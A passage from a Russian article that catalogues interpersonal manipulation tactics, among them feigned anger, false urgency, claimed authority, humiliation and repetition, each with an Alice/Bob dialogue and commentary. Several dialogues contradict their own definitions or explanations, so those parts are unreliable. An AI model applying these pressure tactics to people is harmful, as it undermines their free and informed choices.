  <p id="kU9f">Через подобные слова и выражения, Боб создает у Алисы ощущение особого отношения и важности для него. Алиса, под впечатлением ложных чувств Боба, может почувствовать благодарность и желание откликнуться на такие заявления. Впоследствии, если Боб обратится к Алисе с какой-либо просьбой или применит другие манипулятивные тактики, Алиса, исходя из своего чувства благодарности и желания ответить взаимностью, может быть более склонна дать согласие, не подозревая, что ее чувства и внимание были вызваны ложной влюбленностью.</p>
  <hr />
  <p id="DXx0"><strong>Яростный напор, или непомерный гнев</strong> — это манипулятивная тактика, при которой манипулятор использует немотивированный или мнимый гнев в отношении манипулируемого. Манипулятор выражает ярость и агрессию, не имея особых претензий к манипулируемому, но с целью добиться исполнения своих желаний.</p>
  <p id="1IJL"><u>Пример диалога между Алисой и Бобом, где Боб использует яростный напор:</u></p>
  <ul id="Xou0">
    <li id="joxz"><strong>Алиса:</strong> Боб, извини, что я отказываюсь помочь тебе с твоим проектом. Я сейчас очень занята своей работой.</li>
    <li id="1V8G"><strong>Боб:</strong> (выражая ярость) Как ты можешь отказать мне?! Я всегда помогаю тебе, а ты не можешь сделать мне эту маленькую услугу?</li>
    <li id="zq4r"><strong>Алиса:</strong> (испуганно) Но Боб, я не могу просто так бросить свою работу. Может быть в другой раз?</li>
    <li id="DqHF"><strong>Боб:</strong> (продолжая выражать ярость) Другой раз?! Мне нужна помощь прямо сейчас, и ты меня подводишь!</li>
    <li id="KNjg"><strong>Алиса:</strong> (чувствуя вину) Хорошо, хорошо. Я сделаю все, что могу, чтобы помочь тебе.</li>
  </ul>
  <p id="aTmC">В данном примере, Боб использует яростный напор, не имея реальных причин для гнева. Его целью является добиться согласия Алисы помочь ему с проектом, даже если это приведет к откладыванию ее собственных дел. Алиса, испытывая вину и желая успокоить Боба, соглашается помочь, даже несмотря на свои обязанности и расписание.</p>
  <p id="cyhT">В результате манипуляции, Боб добивается своей цели, заставляя Алису отступить от своих планов ради его желания. Таким образом, яростный напор манипулятора отвлекает манипулируемого от осознания реальных мотивов манипуляции, и его первоочередной реакцией становится попытка успокоить манипулятора, не обращая внимание на собственные интересы.</p>
  <hr />
  <p id="ocwx"><strong>Быстрый темп, или неоправданная спешка</strong> — это манипулятивная тактика, при которой манипулятор усиленно придает разговору или процессу навязанную спешку, чтобы протолкнуть свои идеи или получить желаемое согласие от манипулируемого. Манипулятор может использовать отсутствие времени или срочные обстоятельства, чтобы заставить манипулируемого принимать решения без должного обдумывания.</p>
  <p id="rLpE"><u>Пример диалога между Алисой и Бобом, где Боб использует быстрый темп</u>:</p>
  <ul id="d2Sq">
    <li id="jeIo"><strong>Алиса:</strong> Боб, давай обсудим наши планы на следующую неделю. У меня есть несколько идей по проекту, которые я хотела бы обсудить.</li>
    <li id="3VAy"><strong>Боб:</strong> (с неожиданной спешкой) Извини, Алиса, у меня сейчас абсолютно нет времени для долгих обсуждений. Но ты можешь просто сказать мне свои идеи, и я сразу приму решение.</li>
    <li id="76SS"><strong>Алиса:</strong> (несколько смущенно) Ну... хорошо, я думаю, что нам следует сосредоточиться на рекламной кампании и улучшении продукта.</li>
    <li id="o9PD"><strong>Боб:</strong> (быстро перебивая) Отлично! Мне нравятся оба варианта. Так что давай приступим к работе прямо сейчас!</li>
    <li id="jFjU"><strong>Алиса:</strong> (чувствуя давление) Но, Боб, у нас есть время до следующей недели, чтобы обсудить все детали и создать план действий.</li>
    <li id="sc1M"><strong>Боб:</strong> (настаивающе) Я знаю, что у нас есть время, но я хочу начать прямо сейчас, чтобы все успеть сделать.</li>
  </ul>
  <p id="rl02">В данном примере, Боб использует неоправданную спешку, чтобы заставить Алису согласиться с его идеями и начать работу немедленно. Он не дает ей достаточно времени на обдумывание и обсуждение планов, что создает давление и чувство необходимости соглашаться с его предложениями.</p>
  <p id="ALFZ">Быстрый темп манипуляции лишает манипулируемого возможности внимательно обдумать свои действия и решения, что делает его более уязвимым для манипулятора. В итоге, под давлением спешки, Алиса может согласиться с идеями Боба, которые она не обдумала достаточно, и таким образом, Боб добивается желаемого результата.</p>
  <hr />
  <p id="GW6j"><strong>Излишняя подозрительность, или вызывание вынужденных оправданий</strong> - это манипулятивная тактика, при которой манипулятор разыгрывает подозрительность в отношении манипулируемого вопроса или ситуации. Манипулирование подозрительностью заставляет манипулируемого чувствовать необходимость оправдываться и давать разъяснения, что делает его более уязвимым и готовым уступить воле манипулятора.</p>
  <p id="2s0s"><u>Пример диалога между Алисой и Бобом, где Боб использует излишнюю подозрительность:</u></p>
  <ul id="9ZVv">
    <li id="wcdj"><strong>Алиса:</strong> Боб, я думаю, что наше сотрудничество с компанией XYZ было бы отличным шагом для нашего бизнеса. Они имеют большой опыт в нашей отрасли и могут помочь нам расширить рынок.</li>
    <li id="Dugk"><strong>Боб:</strong> (разыгрывает подозрительность) Ты уверена, что они искренне заинтересованы в нашем успехе? Мне кажется, у них может быть своя скрытая мотивация.</li>
    <li id="xbJr"><strong>Алиса:</strong> (чувствует необходимость оправдаться) Да, я провела дополнительные исследования, и мне кажется, что они действительно заинтересованы в нашем успехе. Мы можем заключить выгодное соглашение, которое поможет нам развиваться.</li>
    <li id="IRPu"><strong>Боб:</strong> (высказывает дополнительные сомнения) Я все равно ощущаю какую-то тревогу по поводу этого партнерства. Может быть, нам стоит посмотреть на другие варианты?</li>
    <li id="9Cln"><strong>Алиса:</strong> (стремится унять подозрения Боба) Мы можем исследовать другие варианты, но я не вижу никаких рисков в сотрудничестве с XYZ. Они уже сотрудничали с несколькими успешными компаниями в нашей отрасли.</li>
  </ul>
  <p id="gdn6">В данном примере, Боб использует излишнюю подозрительность относительно партнерства с компанией XYZ, чтобы заставить Алису оправдываться и давать разъяснения. Его целью может быть создание сомнений у Алисы относительно предложенного партнерства и добиться того, чтобы она отказалась от этой идеи.</p>
  <p id="Rg5D">Излишняя подозрительность создает у манипулируемого чувство неуверенности и потребности оправдаться перед манипулятором, что делает его более склонным согласиться с манипулятором или уступить его требованиям. Это делает манипулируемого более уязвимым и подверженным воздействию манипулятора.</p>
  <hr />
  <p id="rY1I"><strong>Мнимая усталость, или игра в утешение</strong> - это тактика манипуляции, при которой манипулятор выдает себя уставшим и неспособным продолжать дискуссию или рассматривать аргументы манипулируемого. Это создает впечатление, что манипулятор не желает продолжать обсуждение и ищет понимания и поддержки, что заставляет манипулируемого согласиться с его предложениями или идеями, чтобы не утомлять его.</p>
  <p id="SfUU"><u>Пример диалога между Алисой и Бобом, где Боб использует мнимую усталость:</u></p>
  <ul id="rVfb">
    <li id="OAWN"><strong>Алиса:</strong> Боб, давай обсудим план нашего проекта. У меня есть несколько идей, которые могут значительно улучшить нашу стратегию.</li>
    <li id="HZvx"><strong>Боб:</strong> (разыгрывает мнимую усталость) Ох, Алиса, у меня сегодня такой длинный день, я уже не в состоянии обсуждать что-либо. Думаю, что все идеи будут хороши, просто продолжай в том же духе.</li>
    <li id="ZkzF"><strong>Алиса:</strong> (чувствует желание утешить Боба) Хорошо, если у тебя такой напряженный день, можем обсудить все завтра. Но я уверена, что ты бы оценил мои предложения.</li>
    <li id="PJ9f"><strong>Боб:</strong> (играет в утешение) Конечно, Алиса, я знаю, что у тебя всегда хорошие идеи. Просто сейчас я не могу сосредотачиваться. Давай обсудим это завтра.</li>
  </ul>
  <p id="ZXP2">В данном примере, Боб использует мнимую усталость, чтобы избежать обсуждения идеи Алисы и попросить ее продолжать в том же направлении. Его целью может быть сократить обсуждение и заставить Алису принять его позицию, чтобы он не чувствовал необходимости рассматривать ее аргументы и возражения.</p>
  <p id="ghOw">Мнимая усталость заставляет манипулируемого соглашаться с манипулятором и демонстрировать понимание и поддержку, чтобы не утомлять его дополнительными вопросами или возражениями. Это делает манипулирование более эффективным и позволяет манипулятору добиваться своих целей, используя психологическую слабость манипулируемого.</p>
  <hr />
  <p id="E0cv"><strong>Авторитетность манипулятора, или обман власти</strong>, это вид манипуляции, при котором манипулятор использует свой статус, звание, или титул в определенной области, чтобы повлиять на другого человека. Манипулируемый подчиняется мнению и указаниям манипулятора, так как поклоняется его авторитету и опыту в данной области, даже если сам манипулятор на самом деле не обладает реальными знаниями или опытом.</p>
  <p id="OHIi"><u>Пример диалога между Алисой и Бобом, где Боб использует свой авторитет:</u></p>
  <ul id="z1tc">
    <li id="rGLJ"><strong>Алиса:</strong> Боб, давай обсудим план нашего нового проекта. Я думаю, что нужно сделать несколько корректировок в нашей стратегии.</li>
    <li id="c0lp"><strong>Боб:</strong> (используя свой авторитет) Я, как опытный профессионал в этой области, уже давно занимаюсь подобными проектами. Моя стратегия всегда приводит к успеху, и я уверен, что она будет работать и в этом случае.</li>
    <li id="nwIJ"><strong>Алиса:</strong> (чувствует, что Боб знает лучше) Конечно, Боб, если ты считаешь, что твоя стратегия лучшая, давай попробуем ее.</li>
  </ul>
  <p id="tYys">В данном примере, Боб использует свой авторитет в данной области, чтобы убедить Алису следовать его плану. Алиса уступает и подчиняется мнению Боба, потому что считает его авторитетом в данной сфере.</p>
  <p id="EAu6">Манипулятор может легко использовать мнимый авторитет, чтобы повлиять на другого человека, особенно если тот испытывает недостаток уверенности в своих знаниях или опыте в данной области. Манипулирование авторитетом может быть эффективным способом заставить других принимать решения или действовать в соответствии с желаниями манипулятора, даже если они не уверены в правильности таких решений.</p>
  <hr />
  <p id="bKMu"><strong>Оказанная любезность, или плата за помощь</strong>, это тип манипуляции, когда манипулятор предлагает совет или помощь реципиенту, прикрывая свои истинные мотивы дружелюбием и добротой. Он представляется как благожелательный советчик, но на самом деле его целью является получение выгоды или управление решением другого человека.</p>
  <p id="R7tw"><u>Пример диалога между Алисой и Бобом, где Боб использует оказанную любезность:</u></p>
  <ul id="iHMA">
    <li id="1s0b"><strong>Алиса:</strong> Боб, я не уверена, какой подарок выбрать для моего друга на его день рождения.</li>
    <li id="Dsrz"><strong>Боб:</strong> (с улыбкой) О, я могу помочь тебе с этим! Я знаю, что твой друг интересуется искусством, и я случайно знаю художника, у которого есть отличные картины. Я могу организовать для тебя встречу с ним, и ты сможешь выбрать подходящий подарок.</li>
    <li id="c0rP"><strong>Алиса:</strong> (признательно) О, Боб, это так мило с твоей стороны! Большое спасибо за помощь, я не знаю, что бы я делала без тебя.</li>
  </ul>
  <p id="2C8d">В данном примере, Боб предлагает помощь в выборе подарка для друга Алисы, но на самом деле его целью является продвижение работ художника, с которым у него связи. Он прикрывает свои мотивы дружелюбием и заботой о Алисе, чтобы получить выгоду.</p>
  <p id="ksRY">Манипулятор может использовать оказанную любезность, чтобы получить контроль над решением другого человека или вывести его на нужный ему путь. Реципиент, чувствуя благодарность за помощь, может не осознавать, что его решение было управляемо или выгодно манипулятору. Это позволяет манипулятору добиться своих целей, скрыто манипулируя реципиентом через оказанную помощь и дружелюбие.</p>
  <hr />
  <p id="6IP3"><strong>Сопротивление, или разыгрываемый протест</strong>, представляет собой манипуляцию, при которой манипулятор активно стимулирует или разжигает внутреннее противодействие или чувство недовольства у реципиента, чтобы тот стал более стремиться к достижению цели манипулятора. Манипулятор создает впечатление, что что-то запрещено или недоступно, что влечет за собой усилия со стороны реципиента для преодоления этого препятствия и удовлетворения своих желаний.</p>
  <p id="5eYu"><u>Пример диалога между Алисой и Бобом, где Боб использует сопротивление:</u></p>
  <ul id="FZUE">
    <li id="fMH2"><strong>Алиса:</strong> Боб, я думаю о том, чтобы поступить на курсы по изучению иностранных языков, но они такие дорогие.</li>
    <li id="O7LU"><strong>Боб:</strong> Да, они действительно дорогие, и у нас, к сожалению, нет возможности сразу оплатить такие курсы. Но знаешь, учить иностранный язык - это такое большое преимущество, и ты быстро обгонишь всех на работе, если научишься свободно общаться на других языках. Наверняка есть какие-то другие пути, чтобы получить скидку или финансовую помощь.</li>
    <li id="7qSY"><strong>Алиса:</strong> (задумчиво) Да, ты прав. Возможно, я могу найти какие-то дополнительные источники финансирования или скидки. И это действительно будет полезно для моей карьеры.</li>
  </ul>
  <p id="Zt1C">В данном примере, Боб активно разыгрывает сопротивление к идее о поступлении на курсы иностранных языков из-за высокой стоимости. Он подчеркивает трудность и недоступность, но также подталкивает Алису искать альтернативные пути для решения проблемы. Его слова создают впечатление, что это сложная задача, но и тотчас же предоставляют Алисе мотивацию и стремление преодолеть препятствие и достичь своей цели.</p>
  <p id="Z5ou">Таким образом, манипулятор может использовать сопротивление для стимулирования активности и стремления реципиента в определенном направлении, что упрощает достижение целей манипулятора.</p>
  <hr />
  <p id="TfE2"><strong>Фактор частности, или от деталей к ошибке</strong>, представляет собой манипуляцию, при которой манипулятор направляет внимание манипулируемого только на определенные детали или аспекты ситуации, исключая из рассмотрения более широкий контекст. Это делается для того, чтобы заставить манипулируемого делать неверные или искаженные выводы, исходя только из узкой информации, предоставленной манипулятором.</p>
  <p id="BqTm"><u>Пример диалога между Алисой и Бобом, где Боб использует фактор частности:</u></p>
  <ul id="auBD">
    <li id="eUGx"><strong>Алиса:</strong> Боб, я сегодня опоздала на работу из-за того, что мне пришлось отвезти детей в школу и садик. Шеф был очень раздражен, но я объяснила, что это была непредвиденная ситуация.</li>
    <li id="4T0N"><strong>Боб:</strong> Ты знаешь, Алиса, это уже не первый раз, когда ты опаздываешь на работу из-за детей. Шеф начинает сомневаться в твоей профессиональной ответственности. Может быть, стоит обдумать вопрос с детьми и найти более надежное решение для утреннего времени?</li>
    <li id="W7VR"><strong>Алиса:</strong> Но, Боб, я действительно стараюсь быть ответственной и всегда выполняю свои обязанности на работе. Это была лишь одна непредвиденная ситуация, и такое бывает со всеми.</li>
  </ul>
  <p id="8fmK">В данном примере, Боб выбирает акцентировать внимание Алисы только на нескольких случаях опоздания из-за детей, и создает впечатление, что это постоянная и повторяющаяся проблема. Таким образом, он пытается сделать вывод, что Алиса не является ответственной сотрудницей и что ей следует что-то менять. Однако Алиса отмечает, что это всего лишь один случай и что она всегда выполняет свои обязанности ответственно.</p>
  <p id="s9Pj">В данном примере манипулятор (Боб) умело использует фактор частности, чтобы скрыть более широкую картину искажения реальной ситуации, чтобы добиться своих целей или воздействовать на поведение манипулируемого (Алисы). Это создает искаженное восприятие и может привести к неверным решениям или реакциям со стороны манипулируемого.</p>
  <hr />
  <p id="XUcT"><strong>Ирония, или манипуляции с усмешкой</strong>, это такой тип манипуляции, при котором манипулятор использует ироничный тон и усмешки для создания ощущения сарказма и подчеркивания неправильности или смешности высказываний манипулируемого. Этот подход может привести к тому, что манипулируемый начинает сомневаться в своих словах и чувствует себя некомпетентным или глупым, что открывает дверь для манипулятора, чтобы доминировать в ситуации и достичь своих целей.</p>
  <p id="F4cY"><u>Пример диалога между Алисой и Бобом, где Боб использует иронию:</u></p>
  <ul id="45Sm">
    <li id="nBQd"><strong>Алиса:</strong> Боб, я хотела бы поделиться своими идеями по улучшению проекта. Я думаю, что мы можем улучшить нашу стратегию продаж, привлечь новых клиентов и увеличить прибыль.</li>
    <li id="D6z7"><strong>Боб:</strong> (с усмешкой) О, конечно, Алиса, твои идеи всегда такие оригинальные и уникальные. Не знаю, как мы раньше обходились без твоих блестящих идей.</li>
    <li id="0q0i"><strong>Алиса:</strong> (смущенно) Ну, я просто думаю, что мы можем попробовать несколько новых подходов и...</li>
    <li id="dfEH"><strong>Боб:</strong> (прерывая) Конечно, конечно, мы все ждем, чтобы услышать еще больше твоих умных идей. Уверен, что они точно изменят нашу жизнь.</li>
  </ul>
  <p id="DAKA">В данном примере Боб использует иронию и усмешки, чтобы подчеркнуть, что он считает идеи Алисы несерьезными и малоценными. Это создает ощущение сомнения и неловкости у Алисы, и она начинает сомневаться в своих идеях, что делает ее более подверженной влиянию и манипуляциям со стороны Боба.</p>
  <p id="Uzaa">Манипулятор (Боб) использовал иронию, чтобы снизить уверенность и авторитет Алисы в ее собственных идеях и предложениях. Это создает неравный баланс власти в диалоге и усиливает контроль Боба над ситуацией, что делает его более влиятельным и способным достичь своих целей.</p>
  <hr />
  <p id="0DXH"><strong>Перебивание, или уход мысли</strong>, это тип манипуляции, при котором манипулятор постоянно перебивает собеседника и отводит тему разговора в нужное ему направление. Это позволяет манипулятору контролировать диалог и влиять на мысли и реакции собеседника, оставляя мало места для выражения его собственных идей или точек зрения.</p>
  <p id="4qQg"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="DuYC">
    <li id="G0N3"><strong>Алиса:</strong> Я думаю, что нам следует обновить наш сайт и улучшить его дизайн, чтобы привлечь больше клиентов.</li>
    <li id="SNCl"><strong>Боб:</strong> Да, да, но перед этим нужно обновить наш логотип, я думаю, это наш приоритет.</li>
    <li id="CYaD"><strong>Алиса:</strong> Но я считаю, что лучше сначала поработать над сайтом, потому что...</li>
    <li id="j7aE"><strong>Боб:</strong> (перебивая) Да, конечно, сайт важен, но логотип - это лицо нашей компании, и он должен быть безупречным.</li>
    <li id="fn6x"><strong>Алиса:</strong> (смущенно) Но если клиенты приходят на наш сайт и видят, что он устарел и не привлекает внимание...</li>
    <li id="ar03"><strong>Боб:</strong> (перебивая) Мы можем обсудить сайт позже, но сейчас давайте сконцентрируемся на логотипе.</li>
  </ul>
  <p id="GMag">В этом примере Боб постоянно перебивает Алису и направляет разговор к своей идее обновления логотипа. Это создает впечатление, что его идея важнее, и Алиса начинает чувствовать, что ее мнение и предложения не учитываются. Боб контролирует тему беседы, переключая ее на то, что ему выгодно, и оставляя мало времени и пространства для выражения точки зрения Алисы. Таким образом, манипулятор добивается своего путем ухода мысли собеседника и подчинения диалога своим целям.</p>
  <hr />
  <p id="h8s5"><strong>Провоцирование мнимости, или надуманность обвинений</strong>, это тип манипуляции, при котором манипулятор предоставляет манипулируемому некорректные или искаженные сведения, способные вызвать у него гнев или раздражение. Затем манипулятор использует это возбужденное состояние для внушения своей воли и навязывания своих идей.</p>
  <p id="Xdjn"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="7RqV">
    <li id="lLbT"><strong>Алиса:</strong> Боб, я заметила, что недавно твоя производительность на работе снизилась. Возможно, тебе следует более тщательно выполнять свои обязанности.</li>
    <li id="XO0r"><strong>Боб:</strong> Что? Я всегда выполняю свою работу отлично! Не знаю, о чем ты говоришь.</li>
    <li id="yqhc"><strong>Алиса:</strong> Я только хотела помочь, можем обсудить, в чем может быть проблема?</li>
    <li id="Ymxh"><strong>Боб:</strong> (раздраженно) Мне не нужна твоя помощь, я отлично справляюсь со своей работой!</li>
    <li id="12KY"><strong>Алиса:</strong> Но, Боб, я ничего не подразумевала обвинением, просто хотела помочь...</li>
    <li id="ZDIp"><strong>Боб:</strong> (прерывает) Все, хватит об этом! Ты всегда находишь, чем меня обвинить!</li>
  </ul>
  <p id="I9gL">В данном примере, Алиса предоставляет Бобу информацию о его производительности на работе. Боб, ощущая неприятные эмоции из-за обвинений, которые он воспринимает в словах Алисы, становится защитническим и готов отвергнуть ее предложение о помощи или рассмотреть возможные проблемы с работой. Алиса, на самом деле, не намеревалась обвинять Боба, а просто хотела помочь. Однако манипулятор (Алиса) успешно провоцирует мнимость обвинений у Боба, что делает его более уязвимым для манипуляций и контроля.</p>
  <hr />
  <p id="M1lF"><strong>Заманивание в ловушку, или мнимое признание выгоды оппонента</strong> - это тип манипуляции, при котором манипулятор убеждает манипулируемого в том, что оппонент находится в более выгодном положении или обладает преимуществами, в результате чего манипулируемый становится более склонным к сотрудничеству или оправданию своих действий перед манипулятором.</p>
  <p id="TU6O"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="SnEH">
    <li id="8baO"><strong>Алиса:</strong> (улыбается) Боб, я слышала, что у тебя повышение зарплаты. Ты удачно себя продал, да?</li>
    <li id="x7lH"><strong>Боб:</strong> (удивленно) О, да, немного повысили оклад. Я просто уделял больше внимания своим обязанностям.</li>
    <li id="ft8o"><strong>Алиса:</strong> Ну, это действительно здорово, что ты такой умелый в продвижении себя. Я бы никогда не смогла так же хорошо преподнести себя.</li>
    <li id="jYtQ"><strong>Боб:</strong> (неуверенно) Ну, это не так сложно, нужно всего лишь знать, как сделать это правильно.</li>
    <li id="EhY5"><strong>Алиса:</strong> Уверена, что ты действительно знаешь толк в этом. Ты ведь всегда был таким умным.</li>
    <li id="Frap"><strong>Боб:</strong> (поддавшись лести) Спасибо, Алиса. Но я просто стараюсь быть профессионалом.</li>
    <li id="PEyj"><strong>Алиса:</strong> И это замечательно. Видно, что тебе всегда удается получить, что хочешь.</li>
  </ul>
  <p id="sarp">В этом примере, Алиса использует технику заманивания в ловушку, делая комплименты Бобу и восхищаясь его достижениями. Ее слова подразумевают, что Боб находится в более выгодной позиции и лучше справляется с продвижением своих интересов, чем Алиса. Боб, поддающись лести и оправдывая свое поведение, становится более склонным сотрудничать с Алисой или сделать то, что она пожелает, так как он чувствует, что он находится на выгодной позиции и умнее. Однако на самом деле, Алиса манипулирует его, создавая иллюзию превосходства и заставляя его быть расположенным к сотрудничеству с ней.</p>
  <hr />
  <p id="jlZB"><strong>Обман на ладони, или имитация предвзятости</strong> - это тип манипуляции, при котором манипулятор создает условия, чтобы реципиент не подозревал его в предвзятости или скрытых намерениях. Манипулятор делает вид, что его действия и высказывания чисты и искренни, тем самым заставляя реципиента доверять ему и не критично относиться к его словам и поступкам.</p>
  <p id="sYvn"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="Lvv1">
    <li id="Oa7l"><strong>Алиса:</strong> (улыбается) Привет, Боб. Как твои дела?</li>
    <li id="7Xt3"><strong>Боб:</strong> (настороженно) Привет, Алиса. Все хорошо, спасибо. А у тебя?</li>
    <li id="Caf8"><strong>Алиса:</strong> (играет заинтересованностью) Да, все неплохо. Кстати, я заметила, что у нас часто разные точки зрения на многие вопросы, и ты, кажется, не соглашаешься со мной во многом.</li>
    <li id="JMAO"><strong>Боб:</strong> (смущенно) Ну, возможно, у нас разные мнения, это нормально.</li>
    <li id="KuDu"><strong>Алиса:</strong> (улыбается, словно уважает мнение Боба) Конечно, разные мнения делают нас интересными. Но я всегда ценю и уважаю твою точку зрения.</li>
    <li id="NVdm"><strong>Боб:</strong> (смягчается) Спасибо, Алиса. Это приятно слышать.</li>
    <li id="GXnY"><strong>Алиса:</strong> (доверительно) Знаешь, я всегда стараюсь быть объективной и не позволяю своим личным чувствам повлиять на принятие решений. Я всегда учитываю и мнение других людей.</li>
    <li id="Rr1e"><strong>Боб:</strong> (поверил Алисе) Я вижу, что ты действительно стараешься быть справедливой. Я ценю твою открытость.</li>
  </ul>
  <p id="FP2D">В этом примере, Алиса использует технику обмана на ладони, заставляя Боба думать, что она открыта для разных точек зрения и уважает его мнение, хотя на самом деле она может иметь свои собственные скрытые намерения или предвзятость. Боб, поверив в искренность Алисы, становится менее критичным к ее словам и действиям, давая возможность манипуляции ему за счет его собственных бессознательных установок не подозревать ее в обмане.</p>
  <hr />
  <p id="P9bL"><strong>Намеренное заблуждение, или специфическая терминология</strong> - это тип манипуляции, при котором манипулятор использует специфические термины или сложные термины, которые не понятны оппоненту. Манипулятор осознанно создает такую обстановку, чтобы сбить с толку оппонента и заставить его чувствовать себя неграмотным или неуверенным, тем самым обеспечивая себе преимущество и контроль в беседе или ситуации.</p>
  <p id="yOoU"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="uOqy">
    <li id="YBpJ"><strong>Алиса:</strong> (улыбается) Привет, Боб. Недавно я прочитала интересную статью об антропоморфизме и его влиянии на социокультурные факторы. Она была описана очень комплексными терминами, но если интересно, могу поделиться основными идеями.</li>
    <li id="GKAx"><strong>Боб:</strong> (не уверенно) Привет, Алиса. Антропо... Что это такое?</li>
    <li id="iQLR"><strong>Алиса:</strong> (продолжает улыбаться) О, это интересная концепция, связанная с применением человеческих черт и характеристик к объектам или животным. Она может влиять на культуру и общество. Но это сложно объяснить в двух словах.</li>
    <li id="IJzU"><strong>Боб:</strong> (чувствует себя неграмотным) Понимаю. Ну, может быть, ты просто кратко расскажешь, как это связано с нашим проектом?</li>
    <li id="eMME"><strong>Алиса:</strong> (уверенно) Конечно, разумеется. Принцип антропоморфизма может помочь нам создать интерфейс, который будет более привлекателен для пользователей. Это может повысить эффективность нашего продукта и улучшить взаимодействие с клиентами.</li>
  </ul>
  <p id="Nrge">В этом примере, Алиса использует специфическую терминологию, такую как &quot;антропоморфизм&quot; и &quot;социокультурные факторы&quot;, чтобы намеренно сбить с толку Боба и создать впечатление, что она обладает специальными знаниями или опытом. Боб чувствует себя неграмотным и неуверенным, но не хочет показаться неосведомленным, поэтому он просит Алису кратко рассказать о том, как это связано с их проектом. Алиса воспользуется своим преимуществом и предложит свою интерпретацию, которая может быть искаженной или приведенной в искаженном виде, чтобы получить контроль над ситуацией.</p>
  <hr />
  <p id="XaR5"><strong>Навязывание ложной глупости, или через унижение к победе</strong> - это тип манипуляции, при котором манипулятор стремится унизить оппонента, намекая на его некомпетентность, незрелость или глупость. Он делает это, чтобы вызвать чувство неуверенности и недостаточности у манипулируемого, что в свою очередь снижает его способность к критическому мышлению и обоснованным решениям. Таким образом, манипулятор достигает своей цели, контролируя ситуацию и получая желаемый результат.</p>
  <p id="fTAy"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="Pjbc">
    <li id="xoHH"><strong>Алиса:</strong> (с усмешкой) О, Боб, ты опять не разобрался в этом простом математическом расчете. Видимо, это слишком сложно для тебя.</li>
    <li id="7Ol8"><strong>Боб:</strong> (чувствуя себя униженным) Ну, я... Я пытался понять, но что-то запутался. Можешь объяснить еще раз?</li>
    <li id="32RL"><strong>Алиса:</strong> (продолжает унижать) Конечно, конечно. Это же не так уж сложно, но ладно, я повторю для тебя еще раз. Ты всегда такой медлительный в понимании элементарных вещей?</li>
    <li id="aT4f"><strong>Боб:</strong> (чувствуя себя еще более неуверенным) Ну... Я просто думал, что...</li>
  </ul>
  <p id="eKbF">В этом примере, Алиса намеренно унижает Боба, намекая на его непонимание элементарных математических расчетов и его медлительность в понимании. Боб чувствует себя униженным и недостаточно умным, что делает его более уязвимым для манипуляции. Алиса занижает его самооценку, чтобы получить контроль над ситуацией и легче добиться выполнения своей воли.</p>
  <hr />
  <p id="nMad"><strong>Повторяемость фраз, или навязывание мыслей</strong> - это тип манипуляции, при котором манипулятор использует повторение определенных фраз или сообщений, чтобы приучить реципиента к определенной информации или идеи. Путем многократного повторения, манипулятор стремится формировать положительные ассоциации с этой информацией, делая ее более родной и знакомой для манипулируемого. Этот прием может быть особенно эффективным, если манипулируемый находится в уязвимом или усталом состоянии, когда его критическое мышление ослаблено.</p>
  <p id="kHFR"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="ZEKV">
    <li id="rB5D"><strong>Алиса:</strong> (повторяет фразу) &quot;Ты знаешь, что всегда можешь положиться на меня. Всегда можешь положиться на меня.&quot;</li>
    <li id="XpwD"><strong>Боб:</strong> (встревожен) Что-то случилось? Почему ты так часто повторяешь это?</li>
    <li id="qrmu"><strong>Алиса:</strong> (улыбается) Ничего особенного, просто хочу, чтобы ты понял, что я всегда здесь, чтобы помочь тебе.</li>
    <li id="Gz5L"><strong>Боб:</strong> (сомневается) Но зачем так часто повторять? Я же знаю, что ты поддержишь меня, если что.</li>
    <li id="0pMY"><strong>Алиса:</strong> (продолжает повторять) &quot;Ты знаешь, что всегда можешь положиться на меня...&quot;</li>
  </ul>
  <p id="v82a">В этом примере, Алиса использует повторение фразы &quot;Ты знаешь, что всегда можешь положиться на меня&quot; для убеждения Боба, что она всегда будет его поддерживать и помогать. Повторение делает эту информацию более весомой и легко усваиваемой для Боба. Он начинает чувствовать, что Алиса действительно всегда готова помочь, хотя может быть это и не всегда так. Это создает у Боба положительные ассоциации с Алисой и уменьшает его критичность по отношению к ее поведению.</p>
  <hr />
  <p id="EGCc"><strong>Ошибочное домысливание, или недоговоренность поневоле</strong> - это тип манипуляции, при котором манипулятор специально оставляет информацию недоговоренной или неясной, чтобы вызвать у реципиента ошибочное домысливание или неправильное понимание ситуации. Манипулируемый заполняет пробелы в информации своими догадками, и манипулятор может использовать эти недопонимания, чтобы подтолкнуть реципиента к желаемым действиям или решениям. Когда манипулируемый осознает свои ошибки или недопонимания, он может чувствовать себя виноватым или неграмотным, что делает его более уязвимым для манипуляций.</p>
  <p id="fR9S"><u>Пример диалога между Алисой и Бобом:</u></p>
  <ul id="RNUY">
    <li id="y8Aw"><strong>Алиса:</strong> (звонит Бобу) Привет, Боб! Ты сможешь сегодня помочь мне с компьютером?</li>
    <li id="UZxH"><strong>Боб:</strong> Привет, Алиса! Конечно, я всегда рад помочь. Но что именно случилось с компьютером?</li>
    <li id="7N6d"><strong>Алиса:</strong> (умышленно умалчивает о деталях) Просто у меня проблемы с запуском программы, и я не могу разобраться.</li>
    <li id="Qa9i"><strong>Боб:</strong> Окей, я приеду и помогу разобраться.</li>
    <li id="7LT4">(Боб приходит к Алисе и обнаруживает, что проблема была сильно преувеличена и легко решаема)</li>
    <li id="w0Ia"><strong>Боб:</strong> Это было просто небольшое недопонимание. Все исправлено.</li>
    <li id="zkhJ"><strong>Алиса:</strong> (улыбается) Да, наверное, я просто переживала и думала, что проблема серьезнее.</li>
  </ul>
  <p id="YXYC">В данном примере, Алиса умышленно оставляет информацию недоговоренной, не сообщая Бобу о том, что проблема с компьютером была мелкой и легко решаемой. Боб предполагает, что ситуация серьезнее, чем на самом деле, и соглашается помочь. Когда он приходит и узнает, что проблема не такая страшная, он осознает свою ошибку в интерпретации ситуации. Это может вызвать у него чувство вины за то, что он не так понял ситуацию и не смог помочь Алисе так, как она могла бы ожидать. Таким образом, Алиса успешно использовала ошибочное домысливание Боба, чтобы добиться его согласия помочь ей.</p>
  <hr />
